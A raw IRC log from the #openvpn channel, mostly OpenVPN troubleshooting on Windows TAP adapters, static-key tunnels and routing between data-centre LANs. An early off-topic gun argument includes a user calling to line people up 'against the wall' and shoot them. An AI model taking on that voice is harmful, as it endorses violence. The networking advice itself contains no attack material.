it isn't considered as an option 19:56 <+pekster> Again, depends on social situation. Guns are a big issue in Mexico now too despite them being effectively illegal for citizens. I'm not saying it's right, but social/pollitical issues are complicated :( 19:57 <+EugeneKay> 19:58 <+pekster> Hey, I made an offer to help with a VPN problem. On the downside, I'm leaving for the gym in a few minutes, so that offer will be scaling some walls for a couple hours :P 20:00 < ancient3> I say that a nationwide, per person reapply, for the use of a firearm is required 20:01 < Suterusu> Teh rules will just narrow and narrow until only 'the authorities' are 'allowed' - Like here - A long and slippery slope, the further down you go the more speed you gain, and the harder it will be to climb up 20:01 < ancient3> And they cant atleast be psycho's to get thair gun permits back. 20:01 <+pekster> Play nice, or take it to ##politics. The only climbing I'm doing is at the gym ;) 20:02 < Suterusu> The true psycho's will get 'em anyhay, by illegal means - Or, Just maybe, Build some, Or something better....... 20:03 < Suterusu> When you can punt a LR36 battery onto the horzion, You might as well be walking around with an AA Cannon 20:06 < Suterusu> Besides, The psychopaths aint from what y'should worry.... They typically somewhat lazy. Don't give 'em the reason to expend the energy - They'll do nothing without a reason (you might no be able to see it, or its logic, But there is awlways a reason) 20:06 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 20:09 < ancient3> Suterusu: Yes, and i would say that the reason for them to have a reason (mostly) is there because they feel there is a reason in the first place. Such as people having guns, thair psycho friends having guns and so on. 20:10 < ancient3> There are always means for reversing the displacement of guns. 20:11 < ancient3> I mean, wouldnt it be nice to know that about 90% of all guns in the US where owned by people who are mostly sane ? 20:11 < Suterusu> define sane 20:11 < ancient3> Not clinicly ill. 20:11 < Suterusu> I'm officially defined as insane - But I can wager I'll make more sense than most 20:13 < ancient3> But you are afraid without your gun i take it ? ... How many times have you protected yourself from getting killed with it ? 20:13 < Suterusu> Even the 'most sane' people can be placed in state of mind where (mass )execution seems not only logical, but right..... Wouldn't it be better to remove the contributing factors to that state of mind? 20:14 < dioz> dumb arguement 20:14 < ancient3> By allowing no control over who gets guns ? No, absolutely not. 20:15 < Suterusu> Anti-Gun law over here.... I do still keep one, but burried some way off - I've got better things closer t'hand, anyway - The one time I woulda 'needed' it, it woulda just made a mess. There's cleaner ways. Just needa be prepared. 20:16 < ancient3> Suterusu: From what im getting you seem to almost believe in some sort of armageddon style stuff ? 20:17 < ancient3> Suterusu: Not that you have an Ioncannon in your front lawn or anything.. :) 20:18 < Suterusu> I don't discount it - BUt I see the 'holes' in 'society' - I can see the direction things taking - it aint gonna be good. Give it ten yrs, and we'll be in 1984 at this rate. 20:19 <+pekster> Hey, improvement in 2.3.0: tap-windows.exe is placed in the installation path. Progress! 20:21 < ancient3> Suterusu: Thats hard to argue with, but it wont kill you. It will only mean unemployment for a while. 20:22 < Suterusu> no, it'll be worse than death - a life of opression 20:23 < Suterusu> It starts, with deweaponising 'em, 'cause w/o most will be unable to think o a way of fighting back 20:24 < Suterusu> For decades, now, There's bin steady increase in training o military for 'urban combat' - And the rumours n reports of deploying military in your streets getting more frequent 20:24 < Suterusu> Won't be long after its happened over there, It'll want to happen over here. 20:26 < ancient3> Suterusu: Lets take this example: All weapons are illegal to have or bear by citizens. They have all been melted down. Explain why this would be bad for you ? 20:26 < Suterusu> It wouldn't - I have the ability to fabricate 20:26 < Suterusu> lol 20:26 < ancient3> So do i, and many others. Yep, saw that comin' 20:27 < Suterusu> There isn't much I can't turn into a weapon, tbh.... 20:27 < ancient3> But for you personally i mean. Are you just scared or do you have enemies that blahblah end so forth ? 20:28 < ancient3> We dont feel that way in our country. 20:28 < ancient3> Have no enemies, have no fear. 20:29 < Suterusu> I'm not 'scared' - But its better to has it and not need it, than need it and not has it - That said, me being me, I piss orf a lotta people - Some enough to try and kill me - no-one seems to be able to manage it. About the only chance they got is a high powered rifle n a lotta distance. And then they better hope it kills me, and either way, want to be running 20:30 <+EugeneKay> Seriously 20:30 <+EugeneKay> There's ##politics or ##guncontrol for this 20:31 < ancient3> Yes EugeneKay, but this is very interresting and noone else will be chatting for atleast one more hour i think. 20:31 -!- mode/#openvpn [+o EugeneKay] by ChanServ 20:31 <@EugeneKay> I don't care. 20:32 < Suterusu> I agree - Seriously, -=- Put 'em up against the wall n shoot 'em. Make the next lot watch. Tell 'em: We're watching. Don't screw up. 20:34 < ancient3> EugeneKay: Agreed. 20:38 < ancient3> So, are there any graphical user interfaces for this openvpn thing ? 20:39 -!- widith [~kenneth@li557-200.members.linode.com] has left #openvpn ["WeeChat 0.3.9.2"] 20:39 <@EugeneKay> Many. 20:39 <@EugeneKay> What OS? 20:39 < ancient3> Linux 20:40 <@EugeneKay> Typically the init scripts are used. NetworkManager has a thing, but.... 20:40 <@EugeneKay> !ubuntu 20:40 <@vpnHelper> "ubuntu" is dont use network manager! 20:40 <@EugeneKay> It sucks. 20:41 < ancient3> Ive heard that too. 20:41 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 20:42 < Suterusu> Seems t'do it for me - Think using same NetworkManager is used in 'buntu - not 100% on that 20:42 < Suterusu> Can't make it auto reconnect, mind 20:42 <+pekster> Why not just write a couple of bash frontends and put a GUI link in your menu or taskbar of choice 20:43 < ancient3> Im using this one: http://dalalven.dtdns.net/linux/gadmin-openvpn/client/gadmin-openvpn-client-0.1.8.tar.gz 20:43 < Suterusu> I'd rather has it connected, constantly - Its not something I'd want to turn orf 20:43 < ancient3> its for gtk+ 20:43 < Suterusu> Ergo, something that should not need turning on 20:45 < Suterusu> Yur, I've played with gadmin suite - I seems to has more options in the network manager what shipped with mint (based on 'buntu) and just as many with this networkmanager (seems t'be gnomes, I'm in KDE) 20:46 < Suterusu> Tho, generally, the gadmin suite is aiight 20:46 < ancient3> Cool, yeah its working for me. 20:47 < Suterusu> As I says, The netwrok manager workin for me... Hasn't given me no problems 20:47 < Suterusu> But spelt better 20:47 < ancient3> Haha, yeah :) 20:49 < ancient3> The netti wrokkie thingy :) 20:50 < Suterusu> Just wish I knew why keep losing connection from me VPN 20:50 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 20:51 < ancient3> Suterusu: Generally a firewall issue. Havnt seen it otherwise. 20:52 < Suterusu> Why'd it be intermittent, tho 20:54 < Suterusu> Can't see nutting in logs for clues, Mosto time I'm r/c before other end knows I'm d/c 20:54 < ancient3> Depends on timeouts of relative inactivity. 20:55 <+pekster> See the description of --keepalive in the manpage (server's timeout is longer than the client's) 20:55 < Suterusu> Shldn't be 'timeouts' or 'relative inactivity' - Was fine the other day.... 20:56 <+pekster> Usually it boils down to a generic firewall problem, stateful firewall timeouts, or an agressive DPI firewall. Or prehaps just a connection with some loss on it 20:56 < Suterusu> Seems to suggest isn't settings - More an external influence 20:56 <+pekster> Sure, could be that too. An attacker sometimes tries to induce reconnections if it's a benefit to learn about your traffic, connection, or to perform an active attack such as TLS downgrade or similar 20:57 <+pekster> What's the log say? Discsonnect due to ping inactivity timeout? 20:57 < Suterusu> Question is - how - and more importantly - How does one ocunter 20:57 < Suterusu> Or counter 20:57 <+pekster> Counter what? I gave you a half-dozen options for the cause, and the resolution is different (or impossible) depending on the problem 21:02 < Suterusu> Well, 1'st lets assume an attacker is 'inducing reconnections' 21:03 < Suterusu> How would this be indentified, and or countered 21:05 <+pekster> Use a different ISP, or perhaps wrap your TLS connection inside an openvpn static tunnel so there's no defining protocol handshake. Possibly changing ports if youre using the default (or just changing it even if you're not to something else random) 21:06 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has joined #openvpn 21:07 < Suterusu> " wrap your TLS connection inside an openvpn static tunnel" Mind elabourating? 21:08 <+rob0> see the static key howto for OpenVPN 1.x 21:08 <+rob0> it is much simpler than client/server setups 21:09 <+pekster> Set up a static-key based tunnel, then connect your TLS session to the endpoint of that tunnel. You get the benefits of X509 key rotation and DH key exchange (for perfect forward secrecy) without the protocol-identifying traffic in the encapsulating UDP traffic to your peer across the wire 21:10 < ngharo> doing that all-in-one would make for an interesting port of openvpn 21:10 < fu_fu> heh 21:10 <+pekster> I've throught about designing a config generator that would do that 21:11 < fu_fu> hi everyone 21:11 <+pekster> It's tough because most setups have requirements beyond that anyway. Maybe as a 'use this then modify to suit' program, but if you're able to do that you can probably just follow the guides and replace the remote IP with the outer-connection's IP anyway 21:11 < ngharo> right 21:12 < ngharo> i just have a feeling people will be confused on which daemon to do routing on etc 21:12 < Suterusu> I'm already, AFAIK, in a 'static key tunnel', n I'm going over TCP, I think... 21:14 <+pekster> !forwardsecrecy 21:15 <+pekster> !static-key 21:15 <@vpnHelper> "static-key" is when you use --secret, you are using a static key. this is only valid for point-to-point setups. Static keys are less secure in that they never change. If someone captures your traffic, and then gains your static key a year from now, they can decrypt the captured traffic. Setups that use certs re-key every hour by default 21:15 <+rob0> If the static key tunnel is only transporting a TLS tunnel, potential loss of forward secrecy is No Big Deal. 21:15 < Suterusu> Also, not sure, but think I'm in 2.x 21:15 <+pekster> Right, I linked that as a hint to figure out how it's configured right now 21:15 <+pekster> Suterusu: PtP ("--secret" or static key mode) is still supported 21:16 <+rob0> Static key tunnels still work. 2.x is backward compatible. 21:16 < Suterusu> n naw, my keys rotate roughly every hr, cld be ½ hr - So don't think thats what I'm playing wtih currently 21:16 -!- jgspratt1 [~jgspratt@66.162.71.166] has joined #openvpn 21:17 <+pekster> You asked how you could theoretically combat active connection tampering. I offered you a solution based on a foundation that DPI was being used against you 21:17 <+pekster> I know that's not what you're using; I'm offering you high-level solutions based on a guess as to your problem ;) 21:17 <+pekster> We're a few layers down the rabit hole :P 21:18 < Suterusu> I'll fetch the JCB.... 21:18 < jgspratt1> I'm pushing these routes to my client, but the client can only get to 10.25.1.101, which is the LAN IP of the OpenVPN server on the server side: http://hastebin.com/tewofigica.rb 21:18 <@vpnHelper> Title: hastebin (at hastebin.com) 21:18 < fu_fu> JCB? 21:18 < jgspratt1> I can ping/ssh to 10.25.1.101, where the server is listening. I can't get to 10.25.1.102, which is an identical server on the server-side LAN. 21:19 < jgspratt1> Routes on the client side show this: http://hastebin.com/ruqafecuni.php 21:19 <@vpnHelper> Title: hastebin (at hastebin.com) 21:19 < Suterusu> Big yellow digger 21:20 -!- ancient3 [~Rockminto@c83-253-113-227.bredband.comhem.se] has quit [Quit: Sheeping.] 21:20 < fu_fu> has anyone installed additional TAPs on Win2008_r2(AWS); i have tried devcon and tapinstall (with addtap.bat) and it wont work 21:20 < jgspratt1> The "10.24.0.0 10.24.9.5 255.248.0.0" line is sending stuff to the tunnel on the client all right, but it isn't making it to the lan on the server side. 21:20 < Suterusu> Glancing over tht static key how-to - I understand how to impliment that, But Don't see how to embed my 'existing' connection inside. prolly me being thick - What am I missin? 21:21 <+rob0> jgspratt1, routes must be bidirectional. Does 10.25.1.102 know to reach the VPN clients through 10.25.1.101? 21:21 < jgspratt1> That's like, that's a good point. 21:22 <+rob0> Suterusu, first bring up the static key tunnel. Then direct your TLS tunnel through the VPN (using --remote on the client side.) 21:22 <+rob0> --remote static.key.VPN.IP 21:23 <+pekster> jgspratt1, there's a handy flowchart for connecting VPN clients to a server-side LAN like that: 21:23 <+pekster> !serverlan 21:23 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 21:23 < jgspratt1> rob0: how can I fix this? I have lots of hosts on my server side that I don't want to reconfigure. could I take the gateway server and point 10.0.0.0/24 back to 10.25.9.2 ? Server routes: http://hastebin.com/jefunuheca.vala 21:23 <@vpnHelper> Title: hastebin (at hastebin.com) 21:23 <+pekster> fu_fu: Use the 'tap-windows.exe' installer you get after a 2.3.0 installation 21:24 -!- paccer [uid4847@gateway/web/irccloud.com/x-vuswusbhbetuhopr] has quit [Quit: Connection closed for inactivity] 21:24 < Suterusu> And where'd I type that?? So, Impliment then use the static key'd tunnel, Then attach to the VPN again? Meaning two sets o config? 21:24 <+pekster> fu_fu: That utility used to be in the 'openvpn\bin\' path of your install, but that's no longer the case as of 2.3.x (including the _rc releases.) Just install the tap-windows.exe installer over the existing install and be sure to install the 'TAP Utilities' (not checked by default) during install 21:24 < fu_fu> i will try that i have not seen it, do i have to unpack the exe installer for OVPN? 21:25 <+pekster> fu_fu: You can do that too if you'd like; use 7-zip and look in the .\$TEMP\ path of the primary installer 21:25 < fu_fu> nice, that could solve my some issue nicely , thanks 21:25 < ngharo> Suterusu: yes 21:25 <+pekster> Yes, I'm milidly annoyed the devs removed that feature in a default installation 21:25 <+pekster> It's not hard to get back, just a hassle for anyone who needs >1 connection for any reason 21:25 < jgspratt1> rob0: ah. the "add a route to the router..." step. 21:26 <+pekster> Not like 2 batch files are a huge strain on the system either. Meh 21:26 < fu_fu> lol 21:26 < jgspratt1> rob0: that's a NAT policy in a SonicWALL, right? 21:27 <+pekster> You shouldn't need NAT unless you don't want (or are unable) to route between the LANs 21:27 <+pekster> Your default gw on the server-side LAN needs to know how to reach the virtual VPN network, otherwise traffic can never get back. Relevant firewalls also need to allow such traffic 21:28 < ngharo> jgspratt1: i think youre looking for "static routes" in a sonicwall 21:28 <+pekster> fu_fu: I don't know about the 32-bit version, but a default 64-bit install of openvpn 2.3.0 provides me with a '\bin\tap-windows.exe' file (same one that's in the installer package at .\$TEMP\tap-windows.exe) 21:29 < fu_fu> pekster, great i will check it out in a few 21:30 < ngharo> pekster: ohh 2.3 has the tap installer stuff back? 21:31 <+pekster> Not really, it just "provides" the installer in the \bin\ path 21:31 <+pekster> I really wish it would give you the stupid utilities 21:31 < ngharo> what good is the installer without the .sys and crap 21:31 <+pekster> No, you get a single TAP-Win32 device 21:32 < ngharo> oh ok, right 21:32 <+pekster> If you want more, or want to run the delete-all batch script, you need to install over itself with that optional feature (ie: the 2 batch scripts) installed. Or copy the batch files over from a 2.2.x install where they were provided by default 21:32 < ngharo> arghh :) 21:32 <+pekster> The actual drivers changed between versions (f.eg: to support IPv6, so you need the new stuff if you want any of the new features.) 21:33 <+pekster> It might be an oversight since the utilities are "optional" - if the nsis script just does a silent "default" install of tap-windows.exe it could be a mistake. Or a way to get you to pay for the non-FOSS version to do "fancy" stuff, I dunno. I couldn't find the .nsi files in a quick look through SVN 21:33 <+pekster> I need to check again and file a bugreport when I can find the files to patch. The project's been split in a couple different github projects. That's ultimately good, but I don't know where half the files are anymore ;) 21:34 < ngharo> yeah i found on github last i looked 21:34 < ngharo> lemme go find it again 21:34 <+pekster> It's lower priority to me since I have a workaround 21:34 <+pekster> Oh, the .nsi source for the openvpn project? (not tap-windows, since that installer is called *from* the openvpn installation) 21:34 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has left #openvpn [] 21:35 <+pekster> If you have a link handy, I'll definitaly take it as it'll save me time hunting. I did a quick trunk checkout and didn't see it in a quick search, so maybe the buildsystem creates it? I don't have the MS VS IDE crap, so that may be non-trivial for me :\ 21:35 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 21:35 < ngharo> pekster: ok, nope. You're right. It was the tap-windows one that I saw 21:35 <+pekster> Yea 21:36 <+pekster> I need to dig, because it's not really in the spirit of the GPL to hide key build components like that :\ 21:36 <+pekster> Hopefully just an oversight 21:36 < ngharo> yeah, maybe i'll see if I can have a buddy build the msvc project 21:36 <+pekster> But, at least the fix is now sitting nicely in the installed file path ;) As I said earlier, "progress" :D 21:36 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has left #openvpn [] 21:36 < ngharo> see what it spits out 21:37 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 21:37 < ngharo> cheers to progress 21:37 <+pekster> Sure, that'd be cool. If he does, have him zip/tar/xz/whatever the result and post it somewhere 21:37 <+pekster> I'd love to do a file-based diff on source vs completed build 21:37 < ngharo> will do 21:37 <+pekster> I know how Linux/Unix builds work, not so much Windows ;) 21:39 <+pekster> I tried building a small project (just a few source files) and it was designed for the MS VS; there was some crappy command-line "freebie" alternative MSFT provided, and it was a huge pain to build it, bad error messages, etc. And that was just a proof-of-concept exploit I was testing for internal security 2 jobs ago. Apparently not paying for Visual Studio isn't the "rigiht" way to go :( 21:39 <+pekster> 21:41 < jgspratt1> ngharo: should I get this: pinging from server side to client side: http://hastebin.com/pugicenuta.coffee 21:41 <@vpnHelper> Title: hastebin (at hastebin.com) 21:45 < ngharo> probably not 21:47 < jgspratt1> ngharo: what should I probably see? 21:47 < ngharo> ping reply :) 21:47 <+pekster> Most (securely) configured systems these days won't follow ICMP redirect messages. What is that 10.24.1.1 host? If it's something upstream of the server LAN you likely have a misconfiguration on the LAN's gateway. If it's on the client-side path, maybe the route wasn't pushed? 21:47 <+pekster> Of course, you should already have pushed the route to the client properly if you followed that handy flowchart ;) 21:48 < jgspratt1> yep, the client has the route 21:48 < fu_fu> is this wrong? from the new readme post installation: file locations notice 21:48 < fu_fu> C:\Program Files\OpenVPN\config (32-bit Windows) 21:48 < fu_fu> C:\Program Files (x86)\OpenVPN\config (64-bit Windows) 21:48 < jgspratt1> 10.24.1.1 is the sonicwall 21:49 <+pekster> fu_fu: Looks right for a 32-bit install on a 64-bit installation. I use D:\Apps\ for all my installs, so that's wrong anyway for me ;) 21:49 <+pekster> See the output of the 'set' command in cmd.exe for details 21:50 <+pekster> jgspratt1: Then you need to fix that sonicwall device so it's correctly routing the traffic, not spitting back an icmp-redirect to the source 21:50 < jgspratt1> pekster: if I see " inet addr:10.25.8.1" on the server on the 10.25 side of things, should my route in the sonicwall take 10.0.0 to 10.25.8.1? 21:51 < jgspratt1> Right now, I have the "gateway" for 10.0.0 traffig going to 10.25.8.1 21:51 <+pekster> The route on the server-side LAN's default gw (your sonicwall I think?) needs to route the VPN network via the IP of the VPN server 21:52 < jgspratt1> pekster: which IP of the VPN server? 21:52 <+pekster> The one on the same network segment; gateways are always on your local network 21:53 < jgspratt1> server: http://hastebin.com/bocefawoto.sm 21:53 <@vpnHelper> Title: hastebin (at hastebin.com) 21:53 < jgspratt1> They are both on the same network segment: 10.25 21:53 <+pekster> You can't do that 21:53 < jgspratt1> I'm assuming tun0, but I've been wrong before 21:53 <+pekster> Put your VPN in a non-conflicting IP range 21:53 < jgspratt1> Why not? 21:53 <+pekster> It doesn't work 21:53 <+pekster> !tcpip 21:53 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 21:54 <+pekster> How the heck does the routing table know "which" 10.25.8.1 to use? Is it the VPN IP with that address, or the LAN device? 21:54 < jgspratt1> It won't conflict. I've mapped 10.25.8.0/24 as the VPN. 21:54 <+pekster> Yes, it will, because that network is a *part* of 10.25/16 21:54 <+pekster> Don't do that. Thta's the reason things are broken 21:55 <+pekster> It's as if you had 2 blocks both called "First" street in a city. Even if one block only goes for 20 feet and has a single house, how does the post office know "which" house to deliver a package to if there are 2 houses both called "500 First Street" ? 21:55 < jgspratt1> Ok, my bad. The sonicwall VPN works that way, so I assumed... 21:56 <+pekster> The device didn't do anything; someone configured the VPN and network information to use those addresses ;) 21:56 < jgspratt1> Ok, so the entire east coast IP range is 10.24.0.0 thorugh 10.31.255.255. 21:57 < jgspratt1> What IP range should I assign to the OpenVPN? 21:57 <+pekster> I can't speak to the rest of your setup. Just don't use overlapping networks on any device that is within the routing scope of your usage 21:57 < jgspratt1> How is the sonicwall supposed to know how to route traffic to an IP that isn't on one of it's interfaces? 21:58 < jgspratt1> If 10.24.1.101 comes in and asks to go to 10.0.0.10, I need it to go to the OpenVPN somehow. 21:58 <+pekster> By adding a route. That link I had the bot paste above is a good place to start if you don't understand basic TCP/IP routing 21:59 < jgspratt1> Which interface to I put the route's destination on? 21:59 <+pekster> What is 10.0.0.10? The link you showed me isn't the OpenVPN server you're talking about? 22:00 < jgspratt1> Some of the links I showed you were. 22:00 < jgspratt1> 10.0.0.10 is on the 10.0.0.0/24 network: west coast data center 22:00 < jgspratt1> 10.24-10.31 is east coast 22:01 < jgspratt1> I'm trying to bridge the east and west coast datacenters. 22:01 <+pekster> That last link, at http://hastebin.com/bocefawoto.sm, shouldn't be overlapping networks like that. Put your PtP links on a non-conflicting network, and add route statements at either end to route to the range(s) accessible at the opposing via the IP of the pper 22:01 <@vpnHelper> Title: hastebin (at hastebin.com) 22:01 <+pekster> Besides firewalls, that's all you have to do 22:02 < jgspratt1> What interface should I make the route go to? 22:02 <+pekster> Your tun interface. OpenVPN takes care of that for you 22:02 <+pekster> 'route $remotely_accessible_network $remote_netamsk' 22:02 < jgspratt1> On the SONICWALL X3, for example, is 10.25, which is where the 10.25.1.101, the physical server hosting the openvpn. 22:02 <+pekster> Do that for any ranges you need, and you're done 22:03 < fu_fu> pekster thanks for the addtap help, i'm stoked 22:03 < jgspratt1> Good ol' 10.25.1.102 doesn't know how to get to 10.0.0.10, so he sends packets to his gateway, 10.25.1.1. Which interface should the gateway forward those packets to? 22:03 < fu_fu> are there issues with running TAP links and TUN links with the same windows service? 22:04 <+hazardous> 10.0.0.1? 22:04 < jgspratt1> pekster: those routes are working on the client, exactly. 22:04 < jgspratt1> hazardous: an ip address is not an inteface 22:04 <+pekster> The IP is on an interface that the kernel knows about 22:04 <+pekster> You don't route "to an interface" 22:04 <+pekster> You route to an IP that is turned into a L2 MAC address via ARP (at least on Ethernet/TCPIP networks) 22:05 < jgspratt1> In the sonicwall routing, I need to add an interface 22:05 < jgspratt1> and I know for a fact this was working before I moved this datacenter 22:05 <+pekster> Then type 'ifconfig' or 'ip addr show' or whatever sonicwall's command is to show you interfaces and figure out what interface it's on 22:05 <+pekster> It's really not hard 22:06 < jgspratt1> pekster: but I am being told to put the IP of the openvpn server outside of the ranges that are actually on my network. 22:06 <+pekster> Forgive me if this sounds like it's not going anywhere, but you're asking very, very basic networking questions that you should really already know before configuring OpenVPN in a complex network topology like this 22:07 < jgspratt1> Let's use examples. say I use 10.28.1.1 as my openvpn server address, which I haven't used any of yet. How could the sonicwall route to that? 22:08 < fu_fu> show interface info or show interface details 22:08 <+pekster> That's just a virtual address. The device needs a physical address 22:08 <+pekster> You route to the address on the physical link 22:08 < jgspratt1> fu_fu: I know all my interface details by heart. 22:08 < fu_fu> right on 22:08 < jgspratt1> which one do you want to know the details of? 22:09 < fu_fu> i'll stay out of it 22:09 <+pekster> I can't really help you if you don't understand how to identify the local IP of a server on your LAN as the target of a route command 22:09 < jgspratt1> are you serious? 22:09 < jgspratt1> you think I make six figures doing networking and I don't know how to ID an IP? 22:10 <+pekster> "what interface do I use?" Seriously? 22:10 <+pekster> You use the interface of the LAN that that IP is reachable on 22:10 <+pekster> I don't give a crap where you work, how much you make, or where you got your degree. Your server-side LAN's remote gateway needs a route that sends traffic BOUND FOR your remote network ranges *via* your VPN server's IP on that LAN 22:11 < jgspratt1> Makes sense to me, sure. Now, give me an example IP to use for the server that won't conflict. 22:11 <+pekster> Is your network all a subset of 10/8? Just use 172.29.0.1 and 172.29.0.2. Done. Now they don't conflict 22:11 <+pekster> Next problem? 22:12 < jgspratt1> Tell me what rule to write in my sonicwall gateway please 22:12 <+pekster> The gateway where, on the server-side LAN? 22:12 <+pekster> The LAN you're trying to expose? 22:12 < jgspratt1> server-side, east coast 22:12 <+pekster> No clue what 'east coast' is. I've seen a single config file 22:13 < jgspratt1> It's on the 10.25 (X3) network. 22:13 <+pekster> Do you mean how to add a route on 10.25/16's default gateway for the remote network? This 10.0.0.0/24 ? 22:14 < jgspratt1> Right. I tried saying 10.0/24 goes to 10.25.8.1 on X3, but clearly that was wrong. 22:15 <+pekster> 'ip route add 10.0.0.0/24 via 10.25.1.101' 22:15 <+pekster> That's after you fix your conflicting networks, of course 22:15 < jgspratt1> So, the OpenVPN is accepting packets on its eth0, not its tun? 22:15 <+pekster> The HOST is 22:15 <+pekster> !tcpip 22:15 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 22:16 <+pekster> !101 22:16 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc 22:17 <+pekster> I don't really think it's fair that I'm doing your basic networking homework for your company and not getting paid for it 22:17 < jgspratt1> I'm assumed tun0, but I've been wrong before 22:21 <+pekster> fu_fu: Sorry, missed your question in this mess. What do you mean running a tun and tap in the same service? You mean having the service start 2 separate configs, one using tun and another tap? Sure, nothing wrong with that at all 22:22 <+pekster> Personally I prefer having more direct control over each process so I can restart/signal them independent of each other, but if you don't need such a feature, the service can manage them both "at once" for you as a master start/stop switch 22:22 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 22:22 -!- mode/#openvpn [+o krzee] by ChanServ 22:23 < fu_fu> i prefer starting them as a daemon, but i need to be able to logoff and the daemon logs off as well, maybe I should set up some scripts for them or making my own services 22:24 < fu_fu> i like to see the running logs on screen too, wish there was a management inteface of some sort, with multiscreens and fancy junk like that 22:25 <+pekster> There is a management interface ;) 22:25 <+pekster> !management 22:25 <@vpnHelper> "management" is (#1) see http://openvpn.net/management for doc on management interface or (#2) read http://svn.openvpn.net/projects/openvpn/obsolete/BETA21-preauto/openvpn/management/management-notes.txt if you are a programmer making a GUI that will interact with OpenVPN 22:25 <+pekster> You can also just log to a file and read that if you only care about the logs 22:26 <+pekster> Otherwise just use the standard OpenVPN-GUI tool if you want a tray icon that lets you start them as you need and terminates them on logoff 22:26 <+pekster> Or write your own scripts. Plenty of options ;) 22:30 < fu_fu> so the service can start client and server scripts at the same time? just checking before i start a new design 22:30 <+pekster> fu_fu: Yup. See: http://openvpn.net/index.php/open-source/documentation/install.html?start=1 22:30 <@vpnHelper> Title: Installation Notes - Installation (Win32) (at openvpn.net) 22:31 <+pekster> Your 3 basic options are: 1) OpenVPN-GUI, 2) via command line (or an app/script you write that calls the command directly,) or 3) system service 22:31 <+pekster> Each are outlined there 22:34 < jgspratt1> pekster: as much as I try, I still get that redirect host message when pinging. 22:34 < jgspratt1> I'm using your address scheme, but I don't seem to get a reply 22:35 <+pekster> I no longer care. You've clearly made a routing mistake somewhere, which isn't surprising given your prior problems overlapping networks and having problems understanding how routing works 22:35 < jgspratt1> 10.25 -> 10.0 network gets redirect host (sonicwall is saying that), and 10.25 <- 10.0 only goes to 10.25.1.101, not, for example, .102 22:35 < fu_fu> cool thanks, i have read these but i am used to windows lately, they tend to leave out what you can NOT do in the docs. i try to ask my goal specifically for this reason. nothing i have yet seen with a few weeks dealing with OpenVPN indicates the same issue tho. Kudos 22:37 <+pekster> fu_fu: Sure. All 3 systems work, and you can configure them to do what you want. Pick one that seems to best meet your needs, then modify it to suit your specific purpose. No way to launch openvpn is "wrong", but some might be more work for your particular end-goals 22:38 < jgspratt1> Well, for anyone who does care to lend a hand: Here are my routing tables on the client and server: http://hastebin.com/gadalaxelu.vala 22:38 <@vpnHelper> Title: hastebin (at hastebin.com) 22:39 < jgspratt1> I'm trynig to get 10.0.0.10 to go to the tun and then to 10.25.1.102 (and then back). I'm afraid that the "and then back" is the problem. 22:39 < jgspratt1> 10.25.1.101 knows to send things "back" to 10.0/24 via it's openvpn, but .102 doesn't. 22:40 <@krzee> understand this well: 22:40 <@krzee> !route 22:40 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 22:40 < jgspratt1> I tried to set the Sonicwall to route stuff headed to 10.0/24 to go to the listeinng 10.25.1.101, where the "local 10.25.1.101" I sset. 22:41 < jgspratt1> allright, give me some minutes to read that. 22:44 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection] 22:45 < jgspratt1> "The answer is iroute!" --this makes sense to me, but I know for a fact (via Github) that this was never in the server.conf file although we are client-to-client. 22:48 < jgspratt1> is the "common name" the hostname? trying to figure out what to call the ccd/ file 22:48 <@krzee> common-name is whatever you made it when making your certs 22:50 < jgspratt1> ah, right 22:58 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 23:01 < jgspratt1> krzee: ok, I setup iroute 23:02 < jgspratt1> http://hastebin.com/rumifebina.hs 23:02 <@vpnHelper> Title: hastebin (at hastebin.com) 23:02 < jgspratt1> That file should be sent to the client. 23:02 < jgspratt1> However, machines on the east coast still cannot get back to the west coast 23:02 <@krzee> !clientlan 23:02 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for 23:02 <@vpnHelper> a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 23:02 <@krzee> follow the flowchart 23:02 <@krzee> i dont have time to walk you through stuff 23:03 * rob0 follows the flowchart 23:03 < jgspratt1> Right, I saw that chart. I did the step "add a route to the router so it knows how to reach the vpn subnet" 23:03 <@krzee> but i did write !route and made the flowcharts in !clientlan and !serverlan if you understand the basics of routing thats all you should really need 23:03 <@krzee> good luck to ya, i need to go test my new product line :D 23:04 < jgspratt1> The route I wrote was if going to 10.0.0.0/24, go to 10.25.1.101 23:04 < jgspratt1> That's the OpenVPN server eth0, however, no packets can actually make it back. 23:04 <+rob0> are you looking at the flowchart? 23:04 < jgspratt1> Yep! 23:05 < 